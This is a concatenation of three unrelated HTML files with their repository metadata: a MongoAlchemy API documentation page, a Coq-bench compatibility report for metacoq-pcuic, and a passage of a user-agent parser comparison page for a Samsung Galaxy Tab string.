title="mongoalchemy.update_expression.UpdateExpression.unset"><tt class="xref py py-func docutils literal"><span class="pre">unset()</span></tt></a></p> </dd></dl> <dl class="method"> <dt id="mongoalchemy.query.Query.inc"> <tt class="descname">inc</tt><big>(</big><em>*args</em>, <em>**kwargs</em><big>)</big><a class="headerlink" href="#mongoalchemy.query.Query.inc" title="Permalink to this definition">¶</a></dt> <dd><p>Refer to: <a class="reference internal" href="update_expressions.html#mongoalchemy.update_expression.UpdateExpression.inc" title="mongoalchemy.update_expression.UpdateExpression.inc"><tt class="xref py py-func docutils literal"><span class="pre">inc()</span></tt></a></p> </dd></dl> <dl class="method"> <dt id="mongoalchemy.query.Query.append"> <tt class="descname">append</tt><big>(</big><em>qfield</em>, <em>value</em><big>)</big><a class="headerlink" href="#mongoalchemy.query.Query.append" title="Permalink to this definition">¶</a></dt> <dd><p>Refer to: <a class="reference internal" href="update_expressions.html#mongoalchemy.update_expression.UpdateExpression.append" title="mongoalchemy.update_expression.UpdateExpression.append"><tt class="xref py py-func docutils literal"><span class="pre">append()</span></tt></a></p> </dd></dl> <dl class="method"> <dt id="mongoalchemy.query.Query.extend"> <tt class="descname">extend</tt><big>(</big><em>qfield</em>, <em>*value</em><big>)</big><a class="headerlink" href="#mongoalchemy.query.Query.extend" title="Permalink to this definition">¶</a></dt> <dd><p>Refer to: <a class="reference internal" href="update_expressions.html#mongoalchemy.update_expression.UpdateExpression.extend" title="mongoalchemy.update_expression.UpdateExpression.extend"><tt class="xref py py-func docutils literal"><span class="pre">extend()</span></tt></a></p> </dd></dl> <dl class="method"> <dt id="mongoalchemy.query.Query.remove"> <tt class="descname">remove</tt><big>(</big><em>qfield</em>, <em>value</em><big>)</big><a class="headerlink" href="#mongoalchemy.query.Query.remove" title="Permalink to this definition">¶</a></dt> <dd><p>Refer to: <a class="reference internal" href="update_expressions.html#mongoalchemy.update_expression.UpdateExpression.remove" title="mongoalchemy.update_expression.UpdateExpression.remove"><tt class="xref py py-func docutils literal"><span class="pre">remove()</span></tt></a></p> </dd></dl> <dl class="method"> <dt id="mongoalchemy.query.Query.remove_all"> <tt class="descname">remove_all</tt><big>(</big><em>qfield</em>, <em>*value</em><big>)</big><a class="headerlink" href="#mongoalchemy.query.Query.remove_all" title="Permalink to this definition">¶</a></dt> <dd><p>Refer to: <a class="reference internal" href="update_expressions.html#mongoalchemy.update_expression.UpdateExpression.remove_all" title="mongoalchemy.update_expression.UpdateExpression.remove_all"><tt class="xref py py-func docutils literal"><span class="pre">remove_all()</span></tt></a></p> </dd></dl> <dl class="method"> <dt id="mongoalchemy.query.Query.add_to_set"> <tt class="descname">add_to_set</tt><big>(</big><em>qfield</em>, <em>value</em><big>)</big><a class="headerlink" href="#mongoalchemy.query.Query.add_to_set" title="Permalink to this definition">¶</a></dt> <dd><p>Refer to: <a class="reference internal" href="update_expressions.html#mongoalchemy.update_expression.UpdateExpression.add_to_set" title="mongoalchemy.update_expression.UpdateExpression.add_to_set"><tt class="xref py py-func docutils literal"><span class="pre">add_to_set()</span></tt></a></p> </dd></dl> <dl class="method"> <dt id="mongoalchemy.query.Query.pop_first"> <tt class="descname">pop_first</tt><big>(</big><em>qfield</em><big>)</big><a class="headerlink" href="#mongoalchemy.query.Query.pop_first" title="Permalink to this definition">¶</a></dt> <dd><p>Refer to: <a class="reference internal" href="update_expressions.html#mongoalchemy.update_expression.UpdateExpression.pop_first" title="mongoalchemy.update_expression.UpdateExpression.pop_first"><tt class="xref py py-func docutils literal"><span class="pre">pop_first()</span></tt></a></p> </dd></dl> <dl class="method"> <dt id="mongoalchemy.query.Query.pop_last"> <tt class="descname">pop_last</tt><big>(</big><em>qfield</em><big>)</big><a class="headerlink" href="#mongoalchemy.query.Query.pop_last" title="Permalink to this definition">¶</a></dt> <dd><p>Refer to: <a class="reference internal" href="update_expressions.html#mongoalchemy.update_expression.UpdateExpression.pop_last" title="mongoalchemy.update_expression.UpdateExpression.pop_last"><tt class="xref py py-func docutils literal"><span class="pre">pop_last()</span></tt></a></p> </dd></dl> </dd></dl> <dl class="class"> <dt id="mongoalchemy.query.QueryResult"> <em class="property">class </em><tt class="descclassname">mongoalchemy.query.</tt><tt class="descname">QueryResult</tt><big>(</big><em>cursor</em>, <em>type</em>, <em>raw_output=False</em>, <em>fields=None</em><big>)</big><a class="headerlink" href="#mongoalchemy.query.QueryResult" title="Permalink to this definition">¶</a></dt> <dd><dl class="method"> <dt id="mongoalchemy.query.QueryResult.next"> <tt class="descname">next</tt><big>(</big><big>)</big><a class="headerlink" href="#mongoalchemy.query.QueryResult.next" title="Permalink to this definition">¶</a></dt> <dd></dd></dl> <dl class="method"> <dt id="mongoalchemy.query.QueryResult.rewind"> <tt class="descname">rewind</tt><big>(</big><big>)</big><a class="headerlink" href="#mongoalchemy.query.QueryResult.rewind" title="Permalink to this definition">¶</a></dt> <dd></dd></dl> <dl class="method"> <dt id="mongoalchemy.query.QueryResult.clone"> <tt class="descname">clone</tt><big>(</big><big>)</big><a class="headerlink" href="#mongoalchemy.query.QueryResult.clone" title="Permalink to this definition">¶</a></dt> <dd></dd></dl> </dd></dl> </div> </div> </div> </div> <div class="sphinxsidebar"> <div class="sphinxsidebarwrapper"> <h4>Previous topic</h4> <p class="topless"><a href="index.html" title="previous chapter">Expression Language — Querying and Updating</a></p> <h4>Next topic</h4> <p class="topless"><a href="query_expressions.html" title="next chapter">Mongo Query Expression Language</a></p> <h3>This Page</h3> <ul class="this-page-menu"> <li><a href="../../_sources/api/expressions/query.txt" rel="nofollow">Show Source</a></li> </ul> <div id="searchbox" style="display: none"> <h3>Quick search</h3> <form class="search" action="../../search.html" method="get"> <input type="text" name="q" /> <input type="submit" value="Go" /> <input type="hidden" name="check_keywords" value="yes" /> <input type="hidden" name="area" value="default" /> </form> <p class="searchtip" style="font-size: 90%"> Enter search terms or a module, class or function name. </p> </div> <script type="text/javascript">$('#searchbox').show(0);</script> </div> </div> <div class="clearer"></div> </div> <div class="related"> <h3>Navigation</h3> <ul> <li class="right" style="margin-right: 10px"> <a href="../../genindex.html" title="General Index" >index</a></li> <li class="right" > <a href="../../py-modindex.html" title="Python Module Index" >modules</a> |</li> <li class="right" > <a href="query_expressions.html" title="Mongo Query Expression Language" >next</a> |</li> <li class="right" > <a href="index.html" title="Expression Language — Querying and Updating" >previous</a> |</li> <li><a href="../../index.html">MongoAlchemy v0.8 documentation</a> &raquo;</li> <li><a href="../index.html" >API documentation</a> &raquo;</li> <li><a href="index.html" >Expression Language — Querying and Updating</a> &raquo;</li> </ul> </div> <div class="footer"> &copy; Copyright 2010, Jeffrey Jenkins. Created using <a href="http://sphinx.pocoo.org/">Sphinx</a> 1.0.8. </div> </body> </html>
shakefu/MongoAlchemy
api/expressions/query.html
HTML
mit
32,684
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>metacoq-pcuic: Not compatible 👼</title> <link rel="shortcut icon" type="image/png" href="../../../../../favicon.png" /> <link href="../../../../../bootstrap.min.css" rel="stylesheet"> <link href="../../../../../bootstrap-custom.css" rel="stylesheet"> <link href="//maxcdn.bootstrapcdn.com/font-awesome/4.2.0/css/font-awesome.min.css" rel="stylesheet"> <script src="../../../../../moment.min.js"></script> <!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries --> <!-- WARNING: Respond.js doesn't work if you view the page via file:// --> <!--[if lt IE 9]> <script src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script> <script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script> <![endif]--> </head> <body> <div class="container"> <div class="navbar navbar-default" role="navigation"> <div class="container-fluid"> <div class="navbar-header"> <a class="navbar-brand" href="../../../../.."><i class="fa fa-lg fa-flag-checkered"></i> Coq bench</a> </div> <div id="navbar" class="collapse navbar-collapse"> <ul class="nav navbar-nav"> <li><a href="../..">clean / released</a></li> <li class="active"><a href="">8.9.0 / metacoq-pcuic - 1.0~alpha2+8.10</a></li> </ul> </div> </div> </div> <div class="article"> <div class="row"> <div class="col-md-12"> <a href="../..">« Up</a> <h1> metacoq-pcuic <small> 1.0~alpha2+8.10 <span class="label label-info">Not compatible 👼</span> </small> </h1> <p>📅 <em><script>document.write(moment("2022-02-01 17:12:23 +0000", "YYYY-MM-DD HH:mm:ss Z").fromNow());</script> (2022-02-01 17:12:23 UTC)</em><p> <h2>Context</h2> <pre># Packages matching: installed # Name # Installed # Synopsis base-bigarray base base-num base Num library distributed with the OCaml compiler base-ocamlbuild base OCamlbuild binary and libraries distributed with the OCaml compiler base-threads base base-unix base camlp5 7.14 Preprocessor-pretty-printer of OCaml conf-findutils 1 Virtual package relying on findutils conf-perl 2 Virtual package relying on perl coq 8.9.0 Formal proof management system num 0 The Num library for arbitrary-precision integer and rational arithmetic ocaml 4.02.3 The OCaml compiler (virtual package) ocaml-base-compiler 4.02.3 Official 4.02.3 release ocaml-config 1 OCaml Switch Configuration ocamlfind 1.9.3 A library manager for OCaml # opam file: opam-version: &quot;2.0&quot; maintainer: &quot;matthieu.sozeau@inria.fr&quot; homepage: &quot;https://metacoq.github.io/metacoq&quot; dev-repo: &quot;git+https://github.com/MetaCoq/metacoq.git#coq-8.10&quot; bug-reports: &quot;https://github.com/MetaCoq/metacoq/issues&quot; authors: [&quot;Abhishek Anand &lt;aa755@cs.cornell.edu&gt;&quot; &quot;Simon Boulier &lt;simon.boulier@inria.fr&gt;&quot; &quot;Cyril Cohen &lt;cyril.cohen@inria.fr&gt;&quot; &quot;Yannick Forster &lt;forster@ps.uni-saarland.de&gt;&quot; &quot;Fabian Kunze &lt;fkunze@fakusb.de&gt;&quot; &quot;Gregory Malecha &lt;gmalecha@gmail.com&gt;&quot; &quot;Matthieu Sozeau &lt;matthieu.sozeau@inria.fr&gt;&quot; &quot;Nicolas Tabareau &lt;nicolas.tabareau@inria.fr&gt;&quot; &quot;Théo Winterhalter &lt;theo.winterhalter@inria.fr&gt;&quot; ] license: &quot;MIT&quot; build: [ [&quot;sh&quot; &quot;./configure.sh&quot;] [make &quot;-j%{jobs}%&quot; &quot;-C&quot; &quot;pcuic&quot;] ] install: [ [make &quot;-C&quot; &quot;pcuic&quot; &quot;install&quot;] ] depends: [ &quot;ocaml&quot; {&gt; &quot;4.02.3&quot;} &quot;coq&quot; {&gt;= &quot;8.10&quot; &amp; &lt; &quot;8.11~&quot;} &quot;coq-equations&quot; {&gt;= &quot;1.2&quot;} &quot;coq-metacoq-template&quot; {= version} &quot;coq-metacoq-checker&quot; {= version} ] synopsis: &quot;A type system equivalent to Coq&#39;s and its metatheory&quot; description: &quot;&quot;&quot; MetaCoq is a meta-programming framework for Coq. The PCUIC module provides a cleaned-up specification of Coq&#39;s typing algorithm along with a certified typechecker for it. This module includes the standard metatheory of PCUIC: Weakening, Substitution, Confluence and Subject Reduction are proven here. &quot;&quot;&quot; # url { # src: &quot;https://github.com/MetaCoq/metacoq/archive/v2.1-beta3.tar.gz&quot; # checksum: &quot;md5=e81b8ecabef788a10337a39b095d54f3&quot; # } url { src: &quot;https://github.com/MetaCoq/metacoq/archive/v1.0-alpha2-8.10.tar.gz&quot; checksum: &quot;sha256=94156cb9397b44915c9217a435a812cabc9651684cd229d5069b34332d0792a2&quot; } </pre> <h2>Lint</h2> <dl class="dl-horizontal"> <dt>Command</dt> <dd><code>true</code></dd> <dt>Return code</dt> <dd>0</dd> </dl> <h2>Dry install 🏜️</h2> <p>Dry install with the current Coq version:</p> <dl class="dl-horizontal"> <dt>Command</dt> <dd><code>opam install -y --show-action coq-metacoq-pcuic.1.0~alpha2+8.10 coq.8.9.0</code></dd> <dt>Return code</dt> <dd>5120</dd> <dt>Output</dt> <dd><pre>[NOTE] Package coq is already installed (current version is 8.9.0). The following dependencies couldn&#39;t be met: - coq-metacoq-pcuic -&gt; ocaml &gt;= 4.02.4 base of this switch (use `--unlock-base&#39; to force) No solution found, exiting </pre></dd> </dl> <p>Dry install without Coq/switch base, to test if the problem was incompatibility with the current Coq/OCaml version:</p> <dl class="dl-horizontal"> <dt>Command</dt> <dd><code>opam remove -y coq; opam install -y --show-action --unlock-base coq-metacoq-pcuic.1.0~alpha2+8.10</code></dd> <dt>Return code</dt> <dd>0</dd> </dl> <h2>Install dependencies</h2> <dl class="dl-horizontal"> <dt>Command</dt> <dd><code>true</code></dd> <dt>Return code</dt> <dd>0</dd> <dt>Duration</dt> <dd>0 s</dd> </dl> <h2>Install 🚀</h2> <dl class="dl-horizontal"> <dt>Command</dt> <dd><code>true</code></dd> <dt>Return code</dt> <dd>0</dd> <dt>Duration</dt> <dd>0 s</dd> </dl> <h2>Installation size</h2> <p>No files were installed.</p> <h2>Uninstall 🧹</h2> <dl class="dl-horizontal"> <dt>Command</dt> <dd><code>true</code></dd> <dt>Return code</dt> <dd>0</dd> <dt>Missing removes</dt> <dd> none </dd> <dt>Wrong removes</dt> <dd> none </dd> </dl> </div> </div> </div> <hr/> <div class="footer"> <p class="text-center"> Sources are on <a href="https://github.com/coq-bench">GitHub</a> © Guillaume Claret 🐣 </p> </div> </div> <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js"></script> <script src="../../../../../bootstrap.min.js"></script> </body> </html>
coq-bench/coq-bench.github.io
clean/Linux-x86_64-4.02.3-2.0.6/released/8.9.0/metacoq-pcuic/1.0~alpha2+8.10.html
HTML
mit
8,081
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8" /> <title>User agent detail - Mozilla/5.0 (Linux; Android 4.0.3; GT-P5100 Build/IML74K) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.133 Safari/535.19</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/materialize/0.97.3/css/materialize.min.css"> <link href="https://fonts.googleapis.com/icon?family=Material+Icons" rel="stylesheet"> <link href="../circle.css" rel="stylesheet"> </head> <body> <div class="container"> <div class="section"> <h1 class="header center orange-text">User agent detail</h1> <div class="row center"> <h5 class="header light"> Mozilla/5.0 (Linux; Android 4.0.3; GT-P5100 Build/IML74K) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.133 Safari/535.19 </h5> </div> </div> <div class="section"> <table class="striped"><tr><th></th><th colspan="3">General</th><th colspan="5">Device</th><th colspan="3">Bot</th><th colspan="2"></th></tr><tr><th>Provider</th><th>Browser</th><th>Engine</th><th>OS</th><th>Brand</th><th>Model</th><th>Type</th><th>Is mobile</th><th>Is touch</th><th>Is bot</th><th>Name</th><th>Type</th><th>Parse time</th><th>Actions</th></tr><tr><th colspan="14" class="green lighten-3">Test suite</th></tr><tr><td>WhichBrowser<br /><small>v2.0.18</small><br /><small>vendor/whichbrowser/parser/tests/data/tablet/manufacturer-samsung.yaml</small></td><td>Chrome 18</td><td>Webkit 535.19</td><td>Android 4.0.3</td><td style="border-left: 1px solid #555"></td><td>Galaxy Tab 2 10.1</td><td>tablet</td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td style="border-left: 1px solid #555"></td><td></td><td><i class="material-icons">close</i></td><td>0</td><td> <!-- Modal Trigger --> <a class="modal-trigger btn waves-effect waves-light" href="#modal-027cff01-4a76-491b-ace3-9289fcbc172f">Detail</a> <!-- Modal Structure --> <div id="modal-027cff01-4a76-491b-ace3-9289fcbc172f" class="modal modal-fixed-footer"> <div class="modal-content"> <h4>WhichBrowser result detail</h4> <p><pre><code class="php">Array ( [headers] => User-Agent: Mozilla/5.0 (Linux; Android 4.0.3; GT-P5100 Build/IML74K) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.133 Safari/535.19 [result] => Array ( [browser] => Array ( [name] => Chrome [version] => 18 [type] => browser ) [engine] => Array ( [name] => Webkit [version] => 535.19 ) [os] => Array ( [name] => Android [version] => 4.0.3 ) [device] => Array ( [type] => tablet [manufacturer] => Samsung [model] => Galaxy Tab 2 10.1 ) ) [readable] => Chrome 18 on a Samsung Galaxy Tab 2 10.1 running Android 4.0.3 ) </code></pre></p> </div> <div class="modal-footer"> <a href="#!" class="modal-action modal-close waves-effect waves-green btn-flat ">close</a> </div> </div> </td></tr><tr><th colspan="14" class="green lighten-3">Providers</th></tr><tr><td>BrowscapFull<br /><small>6014</small><br /></td><td>Chrome 18.0</td><td>WebKit </td><td>Android 4.0</td><td style="border-left: 1px solid #555">Samsung</td><td>Galaxy Tab 2 10.1</td><td>Tablet</td><td>yes</td><td>yes</td><td style="border-left: 1px solid #555"></td><td></td><td></td><td>0.024</td><td> <!-- Modal Trigger --> <a class="modal-trigger btn waves-effect waves-light" href="#modal-47a9cd06-e213-4882-bc34-db6aed664223">Detail</a> <!-- Modal Structure --> <div id="modal-47a9cd06-e213-4882-bc34-db6aed664223" class="modal modal-fixed-footer"> <div class="modal-content"> <h4>BrowscapFull result detail</h4> <p><pre><code class="php">stdClass Object ( [browser_name_regex] => /^mozilla\/5\.0 \(.*linux.*android.4\.0.*gt\-p5100 build\/.*\) applewebkit\/.* \(khtml.* like gecko\) chrome\/18\..*safari\/.*$/ [browser_name_pattern] => mozilla/5.0 (*linux*android?4.0*gt-p5100 build/*) applewebkit/* (khtml* like gecko) chrome/18.*safari/* [parent] => Chrome 18.0 for Android [comment] => Chrome 18.0 [browser] => Chrome [browser_type] => Browser [browser_bits] => 32 [browser_maker] => Google Inc [browser_modus] => unknown [version] => 18.0 [majorver] => 18 [minorver] => 0 [platform] => Android [platform_version] => 4.0 [platform_description] => Android OS [platform_bits] => 32 [platform_maker] => Google Inc [alpha] => [beta] => [win16] => [win32] => [win64] => [frames] => 1 [iframes] => 1 [tables] => 1 [cookies] => 1 [backgroundsounds] => [javascript] => 1 [vbscript] => [javaapplets] => [activexcontrols] => [ismobiledevice] => 1 [istablet] => 1 [issyndicationreader] => [crawler] => [isfake] => [isanonymized] => [ismodified] => [cssversion] => 3 [aolversion] => 0 [device_name] => Galaxy Tab 2 10.1 [device_maker] => Samsung [device_type] => Tablet [device_pointing_method] => touchscreen [device_code_name] => GT-P5100 [device_brand_name] => Samsung [renderingengine_name] => WebKit [renderingengine_version] => unknown [renderingengine_description] => For Google Chrome, iOS (including both mobile Safari, WebViews within third-party apps, and web clips), Safari, Arora, Midori, OmniWeb, Shiira, iCab since version 4, Web, SRWare Iron, Rekonq, and in Maxthon 3. [renderingengine_maker] => Apple Inc ) </code></pre></p> </div> <div class="modal-footer"> <a href="#!" class="modal-action modal-close waves-effect waves-green btn-flat ">close</a> </div> </div> </td></tr><tr><td>BrowscapLite<br /><small>6014</small><br /></td><td>Chrome </td><td><i class="material-icons">close</i></td><td>Android </td><td style="border-left: 1px solid #555"><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td>Mobile Phone</td><td>yes</td><td><i class="material-icons">close</i></td><td style="border-left: 1px solid #555"><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td>0.008</td><td> <!-- Modal Trigger --> <a class="modal-trigger btn waves-effect waves-light" href="#modal-42bb56ba-b834-47c5-bea0-c0270e9ab371">Detail</a> <!-- Modal Structure --> <div id="modal-42bb56ba-b834-47c5-bea0-c0270e9ab371" class="modal modal-fixed-footer"> <div class="modal-content"> <h4>BrowscapLite result detail</h4> <p><pre><code class="php">stdClass Object ( [browser_name_regex] => /^mozilla\/5\.0 \(.*linux.*android.*\) applewebkit\/.* \(khtml.* like gecko\) chrome\/.*safari\/.*$/ [browser_name_pattern] => mozilla/5.0 (*linux*android*) applewebkit/* (khtml* like gecko) chrome/*safari/* [parent] => Chrome Generic for Android [comment] => Chrome Generic [browser] => Chrome [browser_type] => unknown [browser_bits] => 0 [browser_maker] => unknown [browser_modus] => unknown [version] => 0.0 [majorver] => 0 [minorver] => 0 [platform] => Android [platform_version] => unknown [platform_description] => unknown [platform_bits] => 0 [platform_maker] => unknown [alpha] => false [beta] => false [win16] => false [win32] => false [win64] => false [frames] => false [iframes] => false [tables] => false [cookies] => false [backgroundsounds] => false [javascript] => false [vbscript] => false [javaapplets] => false [activexcontrols] => false [ismobiledevice] => 1 [istablet] => [issyndicationreader] => false [crawler] => false [isfake] => false [isanonymized] => false [ismodified] => false [cssversion] => 0 [aolversion] => 0 [device_name] => unknown [device_maker] => unknown [device_type] => Mobile Phone [device_pointing_method] => unknown [device_code_name] => unknown [device_brand_name] => unknown [renderingengine_name] => unknown [renderingengine_version] => unknown [renderingengine_description] => unknown [renderingengine_maker] => unknown ) </code></pre></p> </div> <div class="modal-footer"> <a href="#!" class="modal-action modal-close waves-effect waves-green btn-flat ">close</a> </div> </div> </td></tr><tr><td>BrowscapPhp<br /><small>6014</small><br /></td><td>Chrome 18.0</td><td><i class="material-icons">close</i></td><td>Android </td><td style="border-left: 1px solid #555"><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td>Mobile Phone</td><td>yes</td><td>yes</td><td style="border-left: 1px solid #555"></td><td></td><td><i class="material-icons">close</i></td><td>0.035</td><td> <!-- Modal Trigger --> <a class="modal-trigger btn waves-effect waves-light" href="#modal-ad0041a2-b0f4-43f6-a70d-cad1443caa68">Detail</a> <!-- Modal Structure --> <div id="modal-ad0041a2-b0f4-43f6-a70d-cad1443caa68" class="modal modal-fixed-footer"> <div class="modal-content"> <h4>BrowscapPhp result detail</h4> <p><pre><code class="php">stdClass Object ( [browser_name_regex] => /^mozilla\/5\.0 \(.*linux.*android.*\) applewebkit\/.* \(khtml.* like gecko\) chrome\/18\..*safari\/.*$/ [browser_name_pattern] => mozilla/5.0 (*linux*android*) applewebkit/* (khtml* like gecko) chrome/18.*safari/* [parent] => Chrome 18.0 for Android [comment] => Chrome 18.0 [browser] => Chrome [browser_type] => unknown [browser_bits] => 0 [browser_maker] => Google Inc [browser_modus] => unknown [version] => 18.0 [majorver] => 18 [minorver] => 0 [platform] => Android [platform_version] => unknown [platform_description] => unknown [platform_bits] => 0 [platform_maker] => unknown [alpha] => false [beta] => false [win16] => false [win32] => false [win64] => false [frames] => false [iframes] => false [tables] => false [cookies] => false [backgroundsounds] => false [javascript] => false [vbscript] => false [javaapplets] => false [activexcontrols] => false [ismobiledevice] => 1 [istablet] => [issyndicationreader] => false [crawler] => [isfake] => false [isanonymized] => false [ismodified] => false [cssversion] => 0 [aolversion] => 0 [device_name] => unknown [device_maker] => unknown [device_type] => Mobile Phone [device_pointing_method] => touchscreen [device_code_name] => unknown [device_brand_name] => unknown [renderingengine_name] => unknown [renderingengine_version] => unknown [renderingengine_description] => unknown [renderingengine_maker] => unknown ) </code></pre></p> </div> <div class="modal-footer"> <a href="#!" class="modal-action modal-close waves-effect waves-green btn-flat ">close</a> </div> </div> </td></tr><tr><td>DonatjUAParser<br /><small>v0.5.1</small><br /></td><td>Chrome 18.0.1025.133</td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td style="border-left: 1px solid #555"><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td style="border-left: 1px solid #555"><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td>0</td><td> <!-- Modal Trigger --> <a class="modal-trigger btn waves-effect waves-light" href="#modal-15fbc1f0-2615-4d42-b5d9-a30dd647b050">Detail</a> <!-- Modal Structure --> <div id="modal-15fbc1f0-2615-4d42-b5d9-a30dd647b050" class="modal modal-fixed-footer"> <div class="modal-content"> <h4>DonatjUAParser result detail</h4> <p><pre><code class="php">Array ( [platform] => Android [browser] => Chrome [version] => 18.0.1025.133 ) </code></pre></p> </div> <div class="modal-footer"> <a href="#!" class="modal-action modal-close waves-effect waves-green btn-flat ">close</a> </div> </div> </td></tr><tr><td>JenssegersAgent<br /><small>v2.3.3</small><br /></td><td>Chrome 18.0.1025.133</td><td><i class="material-icons">close</i></td><td>AndroidOS 4.0.3</td><td style="border-left: 1px solid #555"><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td>yes</td><td><i class="material-icons">close</i></td><td style="border-left: 1px solid #555"></td><td></td><td><i class="material-icons">close</i></td><td>0</td><td> <!-- Modal Trigger --> <a class="modal-trigger btn waves-effect waves-light" href="#modal-b85a2b91-6a55-4436-a82c-1ea0d46e2e51">Detail</a> <!-- Modal Structure --> <div id="modal-b85a2b91-6a55-4436-a82c-1ea0d46e2e51" class="modal modal-fixed-footer"> <div class="modal-content"> <h4>JenssegersAgent result detail</h4> <p><pre><code class="php">Array ( [browserName] => Chrome [browserVersion] => 18.0.1025.133 [osName] => AndroidOS [osVersion] => 4.0.3 [deviceModel] => SamsungTablet [isMobile] => 1 [isRobot] => [botName] => ) </code></pre></p> </div> <div class="modal-footer"> <a href="#!" class="modal-action modal-close waves-effect waves-green btn-flat ">close</a> </div> </div> </td></tr><tr><td>NeutrinoApiCom<br /><small></small><br /></td><td>Chrome 18.0.1025.133</td><td><i class="material-icons">close</i></td><td>Android 4.0.3</td><td style="border-left: 1px solid #555">Samsung</td><td>Galaxy Tab 2 (10.1)</td><td>desktop-browser</td><td></td><td><i class="material-icons">close</i></td><td style="border-left: 1px solid #555"></td><td></td><td><i class="material-icons">close</i></td><td>0.27802</td><td> <!-- Modal Trigger --> <a class="modal-trigger btn waves-effect waves-light" href="#modal-8c2a7a4e-3fbf-4df2-8d61-5e730422f67b">Detail</a> <!-- Modal Structure --> <div id="modal-8c2a7a4e-3fbf-4df2-8d61-5e730422f67b" class="modal modal-fixed-footer"> <div class="modal-content"> <h4>NeutrinoApiCom result detail</h4> <p><pre><code class="php">stdClass Object ( [mobile_screen_height] => 0 [is_mobile] => [type] => desktop-browser [mobile_brand] => Samsung [mobile_model] => Galaxy Tab 2 (10.1) [version] => 18.0.1025.133 [is_android] => [browser_name] => Chrome [operating_system_family] => Android [operating_system_version] => 4.0.3 [is_ios] => [producer] => Google Inc. [operating_system] => Android 4.0.x Ice Cream Sandwich [mobile_screen_width] => 0 [mobile_browser] => ) </code></pre></p> </div> <div class="modal-footer"> <a href="#!" class="modal-action modal-close waves-effect waves-green btn-flat ">close</a> </div> </div> </td></tr><tr><td>PiwikDeviceDetector<br /><small>3.6.1</small><br /></td><td>Chrome 18.0</td><td>WebKit </td><td>Android 4.0</td><td style="border-left: 1px solid #555">Samsung</td><td>GALAXY Tab 2 10.1"</td><td>tablet</td><td>yes</td><td></td><td style="border-left: 1px solid #555"></td><td></td><td></td><td>0.004</td><td> <!-- Modal Trigger --> <a class="modal-trigger btn waves-effect waves-light" href="#modal-4a941d34-a8d3-4914-9724-346f60ad7046">Detail</a> <!-- Modal Structure --> <div id="modal-4a941d34-a8d3-4914-9724-346f60ad7046" class="modal modal-fixed-footer"> <div class="modal-content"> <h4>PiwikDeviceDetector result detail</h4> <p><pre><code class="php">Array ( [client] => Array ( [type] => browser [name] => Chrome [short_name] => CH [version] => 18.0 [engine] => WebKit ) [operatingSystem] => Array ( [name] => Android [short_name] => AND [version] => 4.0 [platform] => ) [device] => Array ( [brand] => SA [brandName] => Samsung [model] => GALAXY Tab 2 10.1" [device] => 2 [deviceName] => tablet ) [bot] => [extra] => Array ( [isBot] => [isBrowser] => 1 [isFeedReader] => [isMobileApp] => [isPIM] => [isLibrary] => [isMediaPlayer] => [isCamera] => [isCarBrowser] => [isConsole] => [isFeaturePhone] => [isPhablet] => [isPortableMediaPlayer] => [isSmartDisplay] => [isSmartphone] => [isTablet] => 1 [isTV] => [isDesktop] => [isMobile] => 1 [isTouchEnabled] => ) ) </code></pre></p> </div> <div class="modal-footer"> <a href="#!" class="modal-action modal-close waves-effect waves-green btn-flat ">close</a> </div> </div> </td></tr><tr><td>SinergiBrowserDetector<br /><small>6.0.1</small><br /></td><td>Chrome 18.0.1025.133</td><td><i class="material-icons">close</i></td><td>Android 4.0.3</td><td style="border-left: 1px solid #555"><i class="material-icons">close</i></td><td></td><td><i class="material-icons">close</i></td><td>yes</td><td><i class="material-icons">close</i></td><td style="border-left: 1px solid #555"></td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td>0.001</td><td> <!-- Modal Trigger --> <a class="modal-trigger btn waves-effect waves-light" href="#modal-ec1cd248-02b0-457e-8a9d-35bb99af008c">Detail</a> <!-- Modal Structure --> <div id="modal-ec1cd248-02b0-457e-8a9d-35bb99af008c" class="modal modal-fixed-footer"> <div class="modal-content"> <h4>SinergiBrowserDetector result detail</h4> <p><pre><code class="php">Array ( [browser] => Sinergi\BrowserDetector\Browser Object ( [userAgent:Sinergi\BrowserDetector\Browser:private] => Sinergi\BrowserDetector\UserAgent Object ( [userAgentString:Sinergi\BrowserDetector\UserAgent:private] => Mozilla/5.0 (Linux; Android 4.0.3; GT-P5100 Build/IML74K) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.133 Safari/535.19 ) [name:Sinergi\BrowserDetector\Browser:private] => Chrome [version:Sinergi\BrowserDetector\Browser:private] => 18.0.1025.133 [isRobot:Sinergi\BrowserDetector\Browser:private] => [isChromeFrame:Sinergi\BrowserDetector\Browser:private] => [isFacebookWebView:Sinergi\BrowserDetector\Browser:private] => [isCompatibilityMode:Sinergi\BrowserDetector\Browser:private] => ) [operatingSystem] => Sinergi\BrowserDetector\Os Object ( [name:Sinergi\BrowserDetector\Os:private] => Android [version:Sinergi\BrowserDetector\Os:private] => 4.0.3 [isMobile:Sinergi\BrowserDetector\Os:private] => 1 [userAgent:Sinergi\BrowserDetector\Os:private] => Sinergi\BrowserDetector\UserAgent Object ( [userAgentString:Sinergi\BrowserDetector\UserAgent:private] => Mozilla/5.0 (Linux; Android 4.0.3; GT-P5100 Build/IML74K) AppleWebKit/535.19 (KHTML, like Gecko) 